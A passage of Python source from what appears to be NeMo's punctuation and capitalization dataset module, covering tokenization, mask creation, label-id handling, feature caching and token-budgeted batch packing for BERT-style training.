pad_label: pad value use for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
punct_label_lines: a list of a tuple of labels for every word in a sequence (str)
capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
verbose: whether to show examples of tokenized data and various progress information
n_jobs: a number of workers used for preparing features. If ``n_jobs <= 0``, then do not use multiprocessing
and run features creation in this process. If not set, number of workers will be equal to the number of
CPUs.
!!WARNING!!
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in one
word have identical labels.
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens in
one word have identical labels
"""
if verbose:
logging.info("Start initial tokenization.")
create_progress_process = progress_queue is None
if n_jobs is None:
n_jobs = min(mp.cpu_count(), len(queries))
if verbose:
logging.info(f"Running tokenization with {n_jobs} jobs.")
# Number of queries in split
split_size = min(len(queries) // max(n_jobs, 1), MAX_NUM_QUERIES_IN_SPLIT)
n_split = len(queries) // split_size
split_queries = [queries[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)] + [
queries[split_size * (n_split - 1) :]
]
split_punct_labels_lines = [
punct_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [punct_label_lines[split_size * (n_split - 1) :]]
split_capit_labels_lines = [
capit_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [capit_label_lines[split_size * (n_split - 1) :]]
args = list(zip(split_queries, split_punct_labels_lines, split_capit_labels_lines, range(n_split)))
if create_progress_process:
progress = Progress(len(queries), "Tokenization", "query")
progress_queue = progress.get_queues()[0]
if n_jobs > 0:
with mp.Pool(n_jobs) as pool:
result = pool.starmap(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue
),
args,
)
else:
result = []
for x in args:
result.append(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue,
)(*x)
)
if create_progress_process:
progress.finish()
input_ids, subtokens_mask, punct_labels, capit_labels = tuple(list(itertools.chain(*e)) for e in zip(*result))
if verbose:
logging.info("Finished initial tokenization.")
get_stats([len(inp) for inp in input_ids])
logging.info(f"Finished clipping and padding.")
for i in range(min(len(input_ids), 5)):
logging.info("*** Example ***")
logging.info("i: %s" % (i))
logging.info("subtokens: %s" % " ".join(list(map(str, input_ids[i]))))
logging.info("subtokens_mask: %s" % " ".join(list(map(str, subtokens_mask[i]))))
logging.info("punct_labels: %s" % " ".join(list(map(str, punct_labels[i]))))
logging.info("capit_labels: %s" % " ".join(list(map(str, capit_labels[i]))))
return input_ids, subtokens_mask, punct_labels, capit_labels
def create_masks_and_segment_ids(
input_ids: np.ndarray,
subtokens_mask: np.ndarray,
pad_id: int,
cls_id: int,
sep_id: int,
ignore_start_end: bool,
ignore_extra_tokens: bool,
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Creates segment ids array, input mask, loss mask.
Segment ids array is BERT token type ids in HuggingFace terminology. It is a zeros array for punctuation
and capitalization task.
Input mask element is ``True`` if an element of ``input_ids`` is not padding and ``False`` otherwise.
Loss mask element is ``True`` for the first token in a word. If ``ignore_start_end=False``, then loss mask
element is ``True`` for [CLS] and [SEP] tokens. If ``ignore_extra_tokens=False``, then loss mask element is ``True``
for all word tokens. In all other cases loss mask elements are ``False``.
Args:
input_ids: an integer array of shape ``[Batch, Time]`` containing ids of source token ids
subtokens_mask: a boolean array of shape ``[Batch, Time]`` which elements are ``True`` if they correspond to
the first token of some word
pad_id: an id of padding token
cls_id: an id of [CLS] token
sep_id: an id of [SEP] token
ignore_start_end: whether to compute loss for [CLS] and [SEP] tokens
ignore_extra_tokens: whether to compute loss for not first tokens in words
Returns:
segment_ids: int8 array of shape [Batch, Time]
input_mask: boolean array of shape [Batch, Time]
loss_mask: boolean array of shape [Batch, Time]
"""
segment_ids = np.zeros_like(input_ids, dtype=np.int8)
input_mask = np.not_equal(input_ids, pad_id)
special_mask = np.equal(input_ids, cls_id) & np.equal(input_ids, sep_id)
if ignore_start_end:
if ignore_extra_tokens:
loss_mask = subtokens_mask
else:
loss_mask = input_mask & ~special_mask
else:
if ignore_extra_tokens:
loss_mask = subtokens_mask | special_mask
else:
loss_mask = input_mask
return segment_ids, input_mask, loss_mask
def create_label_ids(unique_labels: Set[str], pad_label: str) -> Dict[str, int]:
"""
Returns label ids dictionary. ``pad_label`` always has id ``0``. Other labels are sorted in alphabetical order.
Args:
unique_labels: a set of labels from which label ids dictionary is created. May or may no contain ``pad_label``
pad_label: label used for padding. It is also a neutral label
Returns:
label ids dictionary
"""
label_ids = {pad_label: 0}
if pad_label in unique_labels:
unique_labels.remove(pad_label)
for label in sorted(unique_labels):
label_ids[label] = len(label_ids)
return label_ids
def load_label_ids(file_path: Union[str, os.PathLike]) -> Dict[str, int]:
ids = {}
with open(file_path) as f:
for i, line in enumerate(f):
ids[line.strip()] = i
return ids
def save_label_ids(label_ids: Dict[str, int], file_path: Path) -> None:
"""
Saves label ids map to a file. In each line of a file one label is saved. Labels are saved in the order of
increasing of their ids.
Args:
label_ids: label id dictionary. Pad label has to have id ``0``
file_path: path to a file where labels will be saved
"""
file_path.parent.mkdir(parents=True, exist_ok=True)
with file_path.open('w') as out:
labels, _ = zip(*sorted(label_ids.items(), key=lambda x: x[1]))
out.write('\n'.join(labels))
def raise_not_equal_labels_error(
first_labels: Dict[str, int], second_labels: Dict[str, int], first_labels_desc: str, second_labels_desc: str
) -> None:
"""
A helper function for raising comprehensible error if labels from 2 sources are different.
Such sources may include:
- labels stored in .nemo checkpoint
- labels stored in tarred dataset
- labels passed in config parameters ``model.common_dataset_parameters.{punct_label_ids,capit_label_ids}``
- labels from files passed in config parameters ``model.class_labels.{punct_labels_file,capit_labels_file}``
- labels in attributes ``PunctuationCapitalizationModel.{punct_label_ids,capit_label_ids}``
- any other source
This function helps to detect configuration early and give error messages that are easy to interpret.
Call this function if ``first_labels != second_labels``.
Args:
first_labels: first dictionary with labels
second_labels: second dictionary with labels
first_labels_desc: a description of first labels
second_labels_desc: a description of second labels
"""
missing_in_first = {k: second_labels[k] for k in set(second_labels) - set(first_labels)}
missing_in_second = {k: first_labels[k] for k in set(first_labels) - set(second_labels)}
not_equal = {
k: {'FIRST LABELS': first_labels[k], 'SECOND LABELS': second_labels[k]}
for k in set(first_labels) & set(second_labels)
if first_labels[k] != second_labels[k]
}
msg = f"{first_labels_desc} (FIRST LABELS) are not equal to {second_labels_desc} (SECOND LABELS)."
if len(missing_in_first) > 0:
msg += f" Number of SECOND LABELS missing in the FIRST LABELS: {len(missing_in_first)}."
if len(missing_in_second) > 0:
msg += f" Number of FIRST LABELS missing in the SECOND LABELS: {len(missing_in_second)}."
if len(not_equal) > 0:
msg += f" Number of labels which are not equal: {len(not_equal)}."
if len(missing_in_first) > 0:
msg += (
f" Several examples of missing SECONDS LABELS in the FIRST LABELS: "
f"{dict(list(missing_in_first.items())[:3])}."
)
if len(missing_in_second) > 0:
msg += (
f" Several examples of missing FIRST LABELS in the SECOND LABELS: "
f"{dict(list(missing_in_second.items())[:3])}."
)
if len(not_equal) > 0:
msg += f" Several examples of labels which are not equal: {dict(list(not_equal.items())[:3])}"
raise ValueError(msg)
def pad(vectors: List[np.ndarray], length: int, value: Union[int, float, bool]) -> np.ndarray:
"""
Pad vectors to length ``length`` and then stack.
Args:
vectors: a list of 1D arrays. Arrays to pad and stack
length: a length of padded sequence. Has to be greater or equal to the maximum length of an element of
``vectors``.
value: a value used for padding
Returns:
an array of padded vectors
"""
result = []
for v in vectors:
result.append(np.concatenate([v, np.full([length - v.shape[0]], value, dtype=v.dtype)]))
return np.stack(result)
class BertPunctuationCapitalizationDataset(Dataset):
"""
A dataset to use during training for punctuation and capitalization tasks.
For inference, you will need
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_infer_dataset.BertPunctuationCapitalizationInferDataset`.
For huge datasets which cannot be loaded into memory simultaneously use
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_tarred_dataset.BertPunctuationCapitalizationTarredDataset`.
Args:
text_file (:obj:`Union[str, os.PathLike]`): a path to a file with sequences, each line should contain a text
without punctuation and capitalization
labels_file (:obj:`Union[str, os.PathLike]`): a path to a file with labels, each line corresponds to word
labels for a sentence in the ``text_file``. Labels have to follow format described in this section of
documentation :ref:`NeMo Data Format<nemo-data-format-label>`.
max_seq_length (:obj:`int`): max number of tokens in a source sequence. ``max_seq_length`` includes for [CLS]
and [SEP] tokens. Sequences which are too long will be clipped by removal of tokens from the end of the
sequence.
tokenizer (:obj:`TokenizerSpec`): a tokenizer instance which has properties ``unk_id``, ``sep_id``, ``bos_id``,
``eos_id``.
num_samples (:obj:`int`, `optional`, defaults to :obj:`-1`): a number of samples you want to use for the
dataset. If ``-1``, use all dataset. Useful for testing.
tokens_in_batch (:obj:`int`, `optional`, defaults to :obj:`5000`): number of tokens in a batch including
paddings and special tokens ([CLS], [SEP], [UNK]). This class :meth:`__getitem__` method returns not
samples but ready batches. Number of samples in a batch is adjusted for input sequences lengths. If input
sequences are short, then a batch will contain more samples. Before packing into batches, samples are
sorted by number of tokens they contain. Sorting allows to reduce number of pad tokens in a batch
significantly. Regular PyTorch data loader shuffling will only permute batches with changing their content.
Proper shuffling is achieved via calling method :meth:`repack_batches_with_shuffle` every epoch.
pad_label (:obj:`str`, `optional`, defaults to :obj:`'O'`): pad value to use for labels. It's also the neutral
label both for punctuation and capitalization.
punct_label_ids (:obj:`Dict[str, int]`, `optional`): dict to map punctuation labels to label ids. For dev set,
use label ids generated during training to support cases when not all labels are present in the dev set.
For training, it is recommended to set ``punct_label_ids`` to ``None`` or load from cache.
capit_label_ids (:obj:`Dict[str, int]`, `optional`): same ``punct_label_ids`` for capitalization labels.
ignore_extra_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to compute loss on
tokens which are not first tokens in a word. For example, assume that word ``'tokenization'`` is tokenized
into ``['token', 'ization']``. If ``ignore_extra_tokens=True``, loss mask for the word is
``[True, False]``, and if ``ignore_extra_tokens=False``, then loss mask is ``[True, True]``.
ignore_start_end (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to ignore [CLS] and [SEP] tokens
in the loss_mask.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to use pickled features or not. If
pickled features does not exist and ``use_cache=True``, then pickled features will be created. Pickled
features are looked for and stored in ``cache_dir``. Pickled features include input ids, subtokens mask
(mask of first tokens in words), encoded punctuation and capitalization labels, label ids. Features
creation consumes considerable time and this ``use_cache=True`` significantly speeds up training starting.
.. warning::
If you spawned more then 1 processes BEFORE dataset creation, then the ``use_cache`` parameter
has to be ``True``. In PyTorch Lightning spawning is performed when `Trainer.fit()
<https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html#fit>`_ or
`Trainer.test() <https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html#test>`_
are called.
cache_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where cache (pickled features)
is stored. By default, ``text_file`` parent directory is used. This parameter is useful if dataset
directory is read-only and you wish to pickle features. In such a case specify a path to directory which
allows writing in ``cache_dir`` parameter.
get_label_frequencies (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to print and save label
frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir`` directory.
label_info_save_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where label frequencies
are saved. Be default a ``text_file`` parent directory is used. When method
:meth:`save_labels_and_get_file_paths` is called label ids are saved into ``label_info_save_dir``
directory. Parameters ``cache_dir`` and ``label_info_save_dir`` are added for cases when directory
containing. This parameter is useful if directory containing ``text_file`` is read-only.
punct_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): a path to a .csv file containing
punctuation label vocabulary. Each line in such a vocabulary file contains exactly one label. The first
line has to contain `pad_label`, otherwise error will be raised.
capit_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): same as ``punct_label_vocab_file`` for
capitalization labels.
add_masks_and_segment_ids_to_batch (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to add
``'loss_mask'``, ``'input_mask'``, ``'segment_ids'`` items to a batch. Useful for creation of tarred
dataset and can NOT be used during model training and inference.
verbose (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to show data examples, label stats and
other useful information.
n_jobs (:obj:`int`, `optional`, defaults to :obj:`0`): number of workers used for tokenization, encoding
labels, creating "first token in word" mask, and clipping. If ``n_jobs <= 0`` data preparation is performed
without multiprocessing. By default ``n_jobs`` is equal to the number of CPUs.
.. warning::
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
tokenization_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting tokenization
progress. Useful for creation of tarred dataset
batch_mark_up_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
deciding which samples batches will contain. Useful for creation of tarred dataset
batch_building_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
batch creation (stacking and padding). Useful for creation of tarred dataset
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports. """
return {
'input_ids': NeuralType(('B', 'T'), ChannelType()),
'segment_ids': NeuralType(('B', 'T'), ChannelType()),
'input_mask': NeuralType(('B', 'T'), MaskType()),
'subtokens_mask': NeuralType(('B', 'T'), MaskType()),
'loss_mask': NeuralType(('B', 'T'), MaskType()),
'punct_labels': NeuralType(('B', 'T'), LabelsType()),
'capit_labels': NeuralType(('B', 'T'), LabelsType()),
}
def __init__(
self,
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
max_seq_length: int,
tokenizer: TokenizerSpec,
num_samples: int = -1,
tokens_in_batch: int = 5000,
pad_label: str = 'O',
punct_label_ids: Optional[Dict[str, int]] = None,
capit_label_ids: Optional[Dict[str, int]] = None,
ignore_extra_tokens: bool = False,
ignore_start_end: bool = True,
use_cache: bool = True,
cache_dir: Optional[Union[str, os.PathLike]] = None,
get_label_frequencies: bool = False,
label_info_save_dir: Optional[Union[str, os.PathLike]] = None,
punct_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
capit_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
add_masks_and_segment_ids_to_batch: bool = True,
verbose: bool = True,
n_jobs: Optional[int] = 0,
tokenization_progress_queue: Optional[mp.Queue] = None,
batch_mark_up_progress_queue: Optional[mp.Queue] = None,
batch_building_progress_queue: Optional[mp.Queue] = None,
) -> None:
""" Initializes BertPunctuationCapitalizationDataset. """
self._check_constructor_parameters(
text_file,
labels_file,
punct_label_ids,
capit_label_ids,
punct_label_vocab_file,
capit_label_vocab_file,
num_samples,
use_cache,
)
if punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
punct_label_ids = load_label_ids(punct_label_vocab_file)
if capit_label_vocab_file is not None:
capit_label_vocab_file = Path(capit_label_vocab_file).expanduser()
capit_label_ids = load_label_ids(capit_label_vocab_file)
text_file, labels_file = Path(text_file).expanduser(), Path(labels_file).expanduser()
if label_info_save_dir is None:
self.label_info_save_dir = text_file.parent
else:
self.label_info_save_dir = Path(label_info_save_dir).expanduser()
self.tokens_in_batch = tokens_in_batch
self.tokenizer = tokenizer
self.pad_label = pad_label
self.ignore_extra_tokens = ignore_extra_tokens
self.ignore_start_end = ignore_start_end
self.add_masks_and_segment_ids_to_batch = add_masks_and_segment_ids_to_batch
self.verbose = verbose
self.batch_mark_up_progress_queue = batch_mark_up_progress_queue
self.batch_building_progress_queue = batch_building_progress_queue
master_device = not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0
features_pkl = self._get_path_to_pkl_features(text_file, cache_dir, max_seq_length, num_samples)
features = None
if master_device and not (features_pkl.is_file() and use_cache):
if verbose:
logging.info(f'Processing {text_file}')
res = self._read_dataset(text_file, labels_file, num_samples)
text_lines, punct_label_lines, capit_label_lines, punct_unique_labels, capit_unique_labels = res
if punct_label_ids:
self._check_label_ids_vs_unique_labels(
punct_label_ids, punct_unique_labels, 'punct', 'punctuation', labels_file
)
else:
punct_label_ids = create_label_ids(punct_unique_labels, self.pad_label)
if capit_label_ids:
self._check_label_ids_vs_unique_labels(
capit_label_ids, capit_unique_labels, 'capit', 'capitalzation', labels_file
)
else:
capit_label_ids = create_label_ids(capit_unique_labels, self.pad_label)
features = _get_features(
text_lines,
punct_label_lines,
capit_label_lines,
max_seq_length,
self.tokenizer,
pad_label=self.pad_label,
punct_label_ids=punct_label_ids,
capit_label_ids=capit_label_ids,
verbose=self.verbose,
progress_queue=tokenization_progress_queue,
n_jobs=n_jobs,
)
if use_cache:
features_pkl.parent.mkdir(parents=True, exist_ok=True)
pickle.dump(tuple(list(features) + [punct_label_ids, capit_label_ids]), open(features_pkl, "wb"))
if self.verbose:
logging.info(f'Features saved to {features_pkl}')
# wait until the master process writes to the processed data files
if torch.distributed.is_initialized():
torch.distributed.barrier()
if features is None:
features = pickle.load(open(features_pkl, 'rb'))
li = features[-2:]
self._check_label_ids_loaded_from_pkl(
punct_label_ids, capit_label_ids, *li, punct_label_vocab_file, capit_label_vocab_file, features_pkl
)
punct_label_ids, capit_label_ids = li[-2], li[-1]
if tokenization_progress_queue is not None:
tokenization_progress_queue.put(len(features[0]))
if self.verbose:
logging.info(f'Features restored from {features_pkl}')
features = features[:-2]
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels = features
self.punct_label_ids, self.capit_label_ids = punct_label_ids, capit_label_ids
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
if get_label_frequencies:
self.punct_label_frequencies = self._calculate_and_save_label_frequencies(self.punct_labels, 'punct')
self.capit_label_frequencies = self._calculate_and_save_label_frequencies(self.capit_labels, 'capit')
def _get_path_to_pkl_features(
self, text_file: Path, cache_dir: Optional[Union[str, os.PathLike]], max_seq_length: int, num_samples: int
) -> Path:
if cache_dir is None:
cache_dir = text_file.parent
else:
cache_dir = Path(cache_dir).expanduser()
vocab_size = getattr(self.tokenizer, "vocab_size", 0)
features_pkl = cache_dir / "cached.{}.{}.max_seq_length{}.vocab{}.{}.punctuation_capitalization.pkl".format(
text_file.stem,
self.tokenizer.name,
max_seq_length,
vocab_size,
f'num_samples{num_samples}' if num_samples > 0 else 'all_samples',
)
return features_pkl
@staticmethod
def _check_constructor_parameters(
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
punct_label_vocab_file: Union[str, os.PathLike],
capit_label_vocab_file: Union[str, os.PathLike],
num_samples: int,
use_cache: bool,
) -> None:
if torch.distributed.is_initialized() and torch.distributed.get_world_size() > 1 and not use_cache:
raise ValueError(
f"If you already created process group and the world size is greater than 1, then `use_cache` "
f"parameter has to `True`. Only master process prepares features and if `use_cache=False`, then "
f"other processes will not be able to obtain features. Alternatively, you may set `use_cache=False` "
f"and set up data before spawning processes. Use `cache_dir` dataset directory with "
f"`text_file` and `labels_file` is read-only."
)
if not (os.path.exists(text_file) and os.path.exists(labels_file)):
raise FileNotFoundError(
f'{text_file} or {labels_file} not found. The data should be split into 2 files: text.txt and'
f'labels.txt. Each line of the text.txt file contains text sequences, where words are separated with'
f'spaces. The labels.txt file contains corresponding labels for each word in text.txt, the labels are'
f'separated with spaces. Each line of the files should follow the format:\n'
f' [WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and '
f' [LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
)
if not str(text_file).endswith('.txt'):
raise ValueError(
f"Parameter `text_file` has to be path to a file with .txt extension, whereas `text_file={text_file}`"
)
if not str(labels_file).endswith('.txt'):
raise ValueError(
f"Parameter `labels_file` has to be path to a file with .txt extension, whereas "
f"`labels_file={labels_file}`"
)
if punct_label_ids is not None and punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
file_punct_label_ids = load_label_ids(punct_label_vocab_file)
if file_punct_label_ids != punct_label_ids:
raise_not_equal_labels_error(
first_labels=punct_label_ids,
second_labels=file_punct_label_ids,
first_labels_desc='Punctuation labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `punct_label_ids`',
second_labels_desc=f'Punctuation labels loaded from file {punct_label_vocab_file} path to which '
f'is passed in parameter `punct_label_vocab_file`',
)
if capit_label_ids is not None and capit_label_vocab_file is not None:
capit_vocab_file = Path(capit_label_vocab_file).expanduser()
file_capit_label_ids = load_label_ids(capit_vocab_file)
if file_capit_label_ids != capit_label_ids:
raise_not_equal_labels_error(
first_labels=capit_label_ids,
second_labels=file_capit_label_ids,
first_labels_desc='Capitalization labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `capit_label_ids`',
second_labels_desc=f'Capitalization labels loaded from file {capit_label_vocab_file} path to '
f'which is passed in parameter `capit_label_vocab_file`',
)
if num_samples == 0:
raise ValueError(
f"Parameter `num_samples` has to be positive or negative whereas `num_samples={num_samples}`. "
f"Negative `num_samples` is for using all samples in a dataset."
)
@staticmethod
def _check_label_ids_loaded_from_pkl(
parameter_punct_label_ids: Dict[str, int],
parameter_capit_label_ids: Dict[str, int],
pkl_punct_label_ids: Any,
pkl_capit_label_ids: Any,
punct_label_vocab_file: Optional[Path],
capit_label_vocab_file: Optional[Path],
features_file: Path,
) -> None:
if not isinstance(pkl_punct_label_ids, dict):
raise ValueError(
f"Punctuation label ids loaded from features file {features_file} has wrong type "
f"{type(pkl_punct_label_ids)}"
)
if parameter_punct_label_ids is not None:
if parameter_punct_label_ids != pkl_punct_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_punct_label_ids,
second_labels=pkl_punct_label_ids,
first_labels_desc="Punctuation labels passed in parameter `punct_label_ids`"
if punct_label_vocab_file is None
else f"Punctuation labels loaded from file {punct_label_vocab_file}",
second_labels_desc=f"Punctuation label ids loaded from features file {features_file}",
)
if not isinstance(pkl_capit_label_ids, dict):
raise ValueError(
f"Capitalization label ids loaded from features file {features_file} has wrong type "
f"{type(pkl_capit_label_ids)}"
)
if parameter_capit_label_ids is not None:
if parameter_capit_label_ids != pkl_capit_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_capit_label_ids,
second_labels=pkl_capit_label_ids,
first_labels_desc="Capitalization labels passed in parameter `capit_label_ids`"
if capit_label_vocab_file is None
else f"Capitalization labels loaded from file {capit_label_vocab_file}",
second_labels_desc=f"Capitalization label ids loaded from features file {features_file}",
)
@staticmethod
def _check_label_ids_vs_unique_labels(
label_ids: Dict[str, int], unique_labels: Set[str], label_type: str, task: str, label_file: Path
) -> None:
if unique_labels - set(label_ids):
not_present_labels = list(unique_labels - set(label_ids))
raise ValueError(
f"{len(not_present_labels)} {task} labels found in {label_file} are not present in "
f"`{label_type}_label_ids`. Examples of unexpected labels from {label_file}: {not_present_labels[:3]}"
)
@staticmethod
def _read_dataset(
text_file: Path, labels_file: Path, num_samples: int
) -> Tuple[Tuple[str, ...], Tuple[str, ...], Tuple[str, ...], Set[str], Set[str]]:
with open(text_file, 'r') as f:
text_lines = f.readlines()
punct_unique_labels, capit_unique_labels = set(), set()
punct_labels_lines, capit_labels_lines = [], []
with labels_file.open() as f:
for i, line in enumerate(f):
pairs = line.split()
if not all([len(p) == 2 for p in pairs]):
raise ValueError(
f"Some label pairs are not pairs but have wrong length (!= 2) in line {i} in label file "
f"{labels_file}"
)
words = text_lines[i].split()
if len(pairs) != len(words):
raise ValueError(
f"In line {i} in text file {text_file} number of words {len(words)} is not equal to the "
f"number of labels {len(pairs)} in labels file {labels_file}."
)
punct_line, capit_line = zip(*pairs)
punct_labels_lines.append(punct_line)
capit_labels_lines.append(capit_line)
punct_unique_labels.update(punct_line)
capit_unique_labels.update(capit_line)
if len(punct_labels_lines) != len(text_lines):
raise ValueError(
f"Number of text lines {len(text_lines)} in text file {text_file} is not equal to the number of lines "
f"{len(punct_labels_lines)} in labels file {labels_file}."
)
dataset = list(zip(text_lines, punct_labels_lines, capit_labels_lines))
if len(dataset) == 0:
raise ValueError(f"Dataset loaded from files {text_file} and {labels_file} is empty.")
if num_samples > 0:
dataset = dataset[:num_samples]
text_lines, punct_labels_lines, capit_labels_lines = zip(*dataset)
return text_lines, punct_labels_lines, capit_labels_lines, punct_unique_labels, capit_unique_labels
def _mark_up_batches(self, input_ids: List[np.ndarray]) -> Tuple[List[int], List[int], List[int]]:
"""
Computes indices of first samples in batch, batch sizes, seq lengths for batches. ``input_ids`` has to be
sorted by number of tokens in ascending order.
Batches are marked up with respect to following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
If ``self.batch_mark_up_progress_queue`` is not None, then the progress in mark up is reported via
``self.batch_mark_up_progress_queue``. Otherwise, ``tqdm`` instance is created in this function.
Args:
input_ids: a list of 1D int32 arrays. Elements of ``input_ids`` have to be sorted by length in ascending
order
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes, batch_seq_lengths = [], [], []
current_max_length = 0
start = 0
if self.batch_mark_up_progress_queue is None:
inp_iterator = tqdm(enumerate(input_ids), total=len(input_ids), desc="Batch mark up", unit="query")
else:
inp_iterator = enumerate(input_ids)
progress_made = 0
for i, inp in inp_iterator:
current_max_length = max(current_max_length, ceil(len(inp) / 8) * 8)
if current_max_length * (i + 1 - start) > self.tokens_in_batch:
batch_size = (i - start) // 8 * 8
if batch_size == 0:
if i > start:
batch_size = i - start
logging.warning(
f"Could not create batch with multiple of 8 size. Probably there is a too long sequence in "
f"the dataset. current_max_length={current_max_length}. Batch size will be reduced to "
f"{batch_size}. tokens_in_batch={self.tokens_in_batch}. The batch includes sequences from "
f"{start} to {i - 1}."
)
else:
logging.warning(
f"Input sequence number {i - 1} is too long. Could not fit it into batch with "
f"{self.tokens_in_batch} tokens. Sequence number {i - 1} will not be added to batches."
)
start = i
current_max_length = ceil(len(inp) / 8) * 8
continue
seq_length = ceil(max([len(inp) for inp in input_ids[start : start + batch_size]]) / 8) * 8
batch_beginnings.append(start)
batch_sizes.append(batch_size)
batch_seq_lengths.append(seq_length)
start += batch_size
current_max_length = ceil(max([len(inp) for inp in input_ids[start : i + 1]]) / 8) * 8
if self.batch_mark_up_progress_queue is not None:
progress_made += 1
if progress_made >= BATCH_MARK_UP_PROGRESS_REPORT_PERIOD:
self.batch_mark_up_progress_queue.put(progress_made)
progress_made = 0
if start < len(input_ids):
seq_length = ceil(max([len(inp) for inp in input_ids[start:]]) / 8) * 8
batch_beginnings.append(start)
batch_sizes.append(len(input_ids) - start)
batch_seq_lengths.append(seq_length)
if self.batch_mark_up_progress_queue is not None:
self.batch_mark_up_progress_queue.put(progress_made)
assert sum(batch_sizes) == len(input_ids)
for i in range(len(batch_beginnings) - 1):
assert batch_beginnings[i] + batch_sizes[i] == batch_beginnings[i + 1]
assert batch_seq_lengths[i] >= max(
[len(inp) for inp in input_ids[batch_beginnings[i] : batch_beginnings[i] + batch_sizes[i]]]
)
return batch_beginnings, batch_sizes, batch_seq_lengths
def _pack_into_batches(
self,
input_ids: List[np.ndarray],
subtokens_mask: List[np.ndarray],
punct_labels: List[np.ndarray],
capit_labels: List[np.ndarray],
) -> List[Dict[str, np.ndarray]]:
"""
Shuffle input sequences, sort them by number of tokens, pad, and pack into batches which satisfy following
conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
Created batches are shuffled before returning.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then ``'segment_ids'``, ``'loss_mask'``, and
``'input_mask'`` are added to the batch.
If ``self.batch_building_progress_queue`` is not ``None``, then padding progress is reported to
``self.batch_building_progress_queue``. Otherwise, a new ``tqdm`` instance is created in ``pack_into_batches``
method.
Args:
input_ids: a list of 1D int32 arrays which contain token ids of dataset source
subtokens_mask: a list of 1D boolean arrays which elements are ``True`` if corresponding token is the
first token in some word
punct_labels: a list of 1D int32 arrays which contain encoded punctuation labels
capit_labels: a list of 1D int32 arrays which contain encoded capitalization labels
Returns:
a list of batches. Each batch is a dictionary with items:
- ``'input_ids'``: a ``np.int32`` numpy array;
- ``'subtokens_mask'``: a boolean numpy array;
- ``'punct_labels'``: a ``np.int32`` numpy array;
- ``'capit_labels'``: a ``np.int32`` numpy array.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then a batch also contain items
- ``'segment_ids'``: a ``np.int8`` numpy array;
- ``'input_mask'``: a boolean numpy array;
- ``'loss_mask'``: a boolean numpy array.
The values of a batch dictionary are numpy arrays of identical shape.
"""
zipped = list(zip(input_ids, subtokens_mask, punct_labels, capit_labels))
random.shuffle(zipped)
input_ids, subtokens_mask, punct_labels, capit_labels = zip(*sorted(zipped, key=lambda x: x[0].shape[0]))
batch_beginnings, batch_sizes, batch_seq_lengths = self._mark_up_batches(input_ids)
batches = []
if self.batch_building_progress_queue is None:
